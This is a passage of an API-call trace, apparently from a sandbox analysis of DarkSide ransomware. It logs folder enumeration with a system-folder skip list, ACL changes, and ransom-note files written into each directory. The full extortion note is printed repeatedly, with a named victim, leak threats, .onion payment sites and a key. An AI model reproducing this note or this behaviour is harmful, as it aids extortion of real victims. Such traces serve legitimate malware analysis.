[0156.382] wcslen (_String="perflogs") returned 0x8 [0156.382] _wcsicmp (_Str1="x64dbg", _Str2="P2SDJqjsKJSaPnHQeAI") returned 8 [0156.382] wcslen (_String="x64dbg") returned 0x6 [0156.382] _wcsicmp (_Str1="public", _Str2="P2SDJqjsKJSaPnHQeAI") returned 67 [0156.382] wcslen (_String="public") returned 0x6 [0156.382] _wcsicmp (_Str1="all users", _Str2="P2SDJqjsKJSaPnHQeAI") returned -15 [0156.382] wcslen (_String="all users") returned 0x9 [0156.383] _wcsicmp (_Str1="default", _Str2="P2SDJqjsKJSaPnHQeAI") returned -12 [0156.383] wcslen (_String="default") returned 0x7 [0156.383] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0156.383] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 0x2a [0156.383] wcscpy (in: _Dest=0x44b00ba, _Source="P2SDJqjsKJSaPnHQeAI" | out: _Dest="P2SDJqjsKJSaPnHQeAI") returned="P2SDJqjsKJSaPnHQeAI" [0156.383] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.383] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.384] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" [0156.384] GetNamedSecurityInfoW () returned 0x0 [0156.384] SetEntriesInAclW () returned 0x0 [0156.384] SetNamedSecurityInfoW () returned 0x0 [0156.400] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58878) returned 1 [0156.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.400] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai")) returned 1 [0156.400] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.400] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.400] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.401] CloseHandle (hObject=0x678) returned 1 [0156.402] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.402] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai")) returned 0x10 [0156.402] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\") returned="" [0156.402] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\") returned 0x3d [0156.402] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0156.402] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d3ab800, ftCreationTime.dwHighDateTime=0x1d5e2a6, ftLastAccessTime.dwLowDateTime=0xdbd5bf40, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbd5bf40, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.403] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd28dab0, ftCreationTime.dwHighDateTime=0x1d5d7ca, ftLastAccessTime.dwLowDateTime=0x907a8cd0, ftLastAccessTime.dwHighDateTime=0x1d5dc07, ftLastWriteTime.dwLowDateTime=0x907a8cd0, ftLastWriteTime.dwHighDateTime=0x1d5dc07, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e6Wwn", cAlternateFileName="")) returned 1 [0156.403] _wcsicmp (_Str1="$recycle.bin", _Str2="e6Wwn") returned -65 [0156.403] wcslen (_String="$recycle.bin") returned 0xc [0156.403] _wcsicmp (_Str1="config.msi", _Str2="e6Wwn") returned -2 [0156.403] wcslen (_String="config.msi") returned 0xa [0156.403] _wcsicmp (_Str1="$windows.~bt", _Str2="e6Wwn") returned -65 [0156.403] wcslen (_String="$windows.~bt") returned 0xc [0156.403] _wcsicmp (_Str1="$windows.~ws", _Str2="e6Wwn") returned -65 [0156.403] wcslen (_String="$windows.~ws") returned 0xc [0156.403] _wcsicmp (_Str1="windows", _Str2="e6Wwn") returned 18 [0156.403] wcslen (_String="windows") returned 0x7 [0156.403] _wcsicmp (_Str1="appdata", _Str2="e6Wwn") returned -4 [0156.403] wcslen (_String="appdata") returned 0x7 [0156.403] _wcsicmp (_Str1="application data", _Str2="e6Wwn") returned -4 [0156.403] wcslen (_String="application data") returned 0x10 [0156.403] _wcsicmp (_Str1="boot", _Str2="e6Wwn") returned -3 [0156.403] wcslen (_String="boot") returned 0x4 [0156.403] _wcsicmp (_Str1="google", _Str2="e6Wwn") returned 2 [0156.403] wcslen (_String="google") returned 0x6 [0156.403] _wcsicmp (_Str1="mozilla", _Str2="e6Wwn") returned 8 [0156.404] wcslen (_String="mozilla") returned 0x7 [0156.404] _wcsicmp (_Str1="program files", _Str2="e6Wwn") returned 11 [0156.404] wcslen (_String="program files") returned 0xd [0156.404] _wcsicmp (_Str1="program files (x86)", _Str2="e6Wwn") returned 11 [0156.404] wcslen (_String="program files (x86)") returned 0x13 [0156.404] _wcsicmp (_Str1="programdata", _Str2="e6Wwn") returned 11 [0156.404] wcslen (_String="programdata") returned 0xb [0156.404] _wcsicmp (_Str1="system volume information", _Str2="e6Wwn") returned 14 [0156.404] wcslen (_String="system volume information") returned 0x19 [0156.404] _wcsicmp (_Str1="tor browser", _Str2="e6Wwn") returned 15 [0156.404] wcslen (_String="tor browser") returned 0xb [0156.404] _wcsicmp (_Str1="windows.old", _Str2="e6Wwn") returned 18 [0156.404] wcslen (_String="windows.old") returned 0xb [0156.404] _wcsicmp (_Str1="intel", _Str2="e6Wwn") returned 4 [0156.404] wcslen (_String="intel") returned 0x5 [0156.404] _wcsicmp (_Str1="msocache", _Str2="e6Wwn") returned 8 [0156.404] wcslen (_String="msocache") returned 0x8 [0156.404] _wcsicmp (_Str1="perflogs", _Str2="e6Wwn") returned 11 [0156.404] wcslen (_String="perflogs") returned 0x8 [0156.404] _wcsicmp (_Str1="x64dbg", _Str2="e6Wwn") returned 19 [0156.404] wcslen (_String="x64dbg") returned 0x6 [0156.404] _wcsicmp (_Str1="public", _Str2="e6Wwn") returned 11 [0156.426] wcslen (_String="public") returned 0x6 [0156.426] _wcsicmp (_Str1="all users", _Str2="e6Wwn") returned -4 [0156.426] wcslen (_String="all users") returned 0x9 [0156.426] _wcsicmp (_Str1="default", _Str2="e6Wwn") returned -1 [0156.427] wcslen (_String="default") returned 0x7 [0156.427] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\*" [0156.427] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\*") returned 0x3e [0156.427] wcscpy (in: _Dest=0x44e00fa, _Source="e6Wwn" | out: _Dest="e6Wwn") returned="e6Wwn" [0156.427] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.427] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.428] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" [0156.428] GetNamedSecurityInfoW () returned 0x0 [0156.429] SetEntriesInAclW () returned 0x0 [0156.429] SetNamedSecurityInfoW () returned 0x0 [0156.452] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58918) returned 1 [0156.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.452] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn")) returned 1 [0156.452] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.452] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.452] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.453] CloseHandle (hObject=0x678) returned 1 [0156.453] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn")) returned 0x10 [0156.453] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\") returned="" [0156.454] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\") returned 0x43 [0156.454] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0156.454] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd28dab0, ftCreationTime.dwHighDateTime=0x1d5d7ca, ftLastAccessTime.dwLowDateTime=0xdbdf44c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbdf44c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.455] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44d59730, ftCreationTime.dwHighDateTime=0x1d5e0a2, ftLastAccessTime.dwLowDateTime=0x2e066650, ftLastAccessTime.dwHighDateTime=0x1d5dccf, ftLastWriteTime.dwLowDateTime=0x2e066650, ftLastWriteTime.dwHighDateTime=0x1d5dccf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Vvuv0bTqUZdX3oZQ", cAlternateFileName="8VVUV0~1")) returned 1 [0156.455] _wcsicmp (_Str1="$recycle.bin", _Str2="8Vvuv0bTqUZdX3oZQ") returned -20 [0156.455] wcslen (_String="$recycle.bin") returned 0xc [0156.455] _wcsicmp (_Str1="config.msi", _Str2="8Vvuv0bTqUZdX3oZQ") returned 43 [0156.455] wcslen (_String="config.msi") returned 0xa [0156.455] _wcsicmp (_Str1="$windows.~bt", _Str2="8Vvuv0bTqUZdX3oZQ") returned -20 [0156.455] wcslen (_String="$windows.~bt") returned 0xc [0156.455] _wcsicmp (_Str1="$windows.~ws", _Str2="8Vvuv0bTqUZdX3oZQ") returned -20 [0156.455] wcslen (_String="$windows.~ws") returned 0xc [0156.455] _wcsicmp (_Str1="windows", _Str2="8Vvuv0bTqUZdX3oZQ") returned 63 [0156.455] wcslen (_String="windows") returned 0x7 [0156.455] _wcsicmp (_Str1="appdata", _Str2="8Vvuv0bTqUZdX3oZQ") returned 41 [0156.455] wcslen (_String="appdata") returned 0x7 [0156.455] _wcsicmp (_Str1="application data", _Str2="8Vvuv0bTqUZdX3oZQ") returned 41 [0156.455] wcslen (_String="application data") returned 0x10 [0156.455] _wcsicmp (_Str1="boot", _Str2="8Vvuv0bTqUZdX3oZQ") returned 42 [0156.455] wcslen (_String="boot") returned 0x4 [0156.455] _wcsicmp (_Str1="google", _Str2="8Vvuv0bTqUZdX3oZQ") returned 47 [0156.455] wcslen (_String="google") returned 0x6 [0156.455] _wcsicmp (_Str1="mozilla", _Str2="8Vvuv0bTqUZdX3oZQ") returned 53 [0156.455] wcslen (_String="mozilla") returned 0x7 [0156.455] _wcsicmp (_Str1="program files", _Str2="8Vvuv0bTqUZdX3oZQ") returned 56 [0156.455] wcslen (_String="program files") returned 0xd [0156.455] _wcsicmp (_Str1="program files (x86)", _Str2="8Vvuv0bTqUZdX3oZQ") returned 56 [0156.455] wcslen (_String="program files (x86)") returned 0x13 [0156.455] _wcsicmp (_Str1="programdata", _Str2="8Vvuv0bTqUZdX3oZQ") returned 56 [0156.455] wcslen (_String="programdata") returned 0xb [0156.455] _wcsicmp (_Str1="system volume information", _Str2="8Vvuv0bTqUZdX3oZQ") returned 59 [0156.455] wcslen (_String="system volume information") returned 0x19 [0156.455] _wcsicmp (_Str1="tor browser", _Str2="8Vvuv0bTqUZdX3oZQ") returned 60 [0156.455] wcslen (_String="tor browser") returned 0xb [0156.455] _wcsicmp (_Str1="windows.old", _Str2="8Vvuv0bTqUZdX3oZQ") returned 63 [0156.455] wcslen (_String="windows.old") returned 0xb [0156.455] _wcsicmp (_Str1="intel", _Str2="8Vvuv0bTqUZdX3oZQ") returned 49 [0156.455] wcslen (_String="intel") returned 0x5 [0156.455] _wcsicmp (_Str1="msocache", _Str2="8Vvuv0bTqUZdX3oZQ") returned 53 [0156.455] wcslen (_String="msocache") returned 0x8 [0156.456] _wcsicmp (_Str1="perflogs", _Str2="8Vvuv0bTqUZdX3oZQ") returned 56 [0156.456] wcslen (_String="perflogs") returned 0x8 [0156.456] _wcsicmp (_Str1="x64dbg", _Str2="8Vvuv0bTqUZdX3oZQ") returned 64 [0156.456] wcslen (_String="x64dbg") returned 0x6 [0156.456] _wcsicmp (_Str1="public", _Str2="8Vvuv0bTqUZdX3oZQ") returned 56 [0156.456] wcslen (_String="public") returned 0x6 [0156.456] _wcsicmp (_Str1="all users", _Str2="8Vvuv0bTqUZdX3oZQ") returned 41 [0156.456] wcslen (_String="all users") returned 0x9 [0156.456] _wcsicmp (_Str1="default", _Str2="8Vvuv0bTqUZdX3oZQ") returned 44 [0156.456] wcslen (_String="default") returned 0x7 [0156.456] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" [0156.456] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned 0x44 [0156.456] wcscpy (in: _Dest=0x451011e, _Source="8Vvuv0bTqUZdX3oZQ" | out: _Dest="8Vvuv0bTqUZdX3oZQ") returned="8Vvuv0bTqUZdX3oZQ" [0156.456] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.456] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.457] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" [0156.457] GetNamedSecurityInfoW () returned 0x0 [0156.458] SetEntriesInAclW () returned 0x0 [0156.458] SetNamedSecurityInfoW () returned 0x0 [0156.459] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e24d90) returned 1 [0156.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.459] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq")) returned 1 [0156.460] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.460] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.460] WriteFile (in: hFile=0x678, 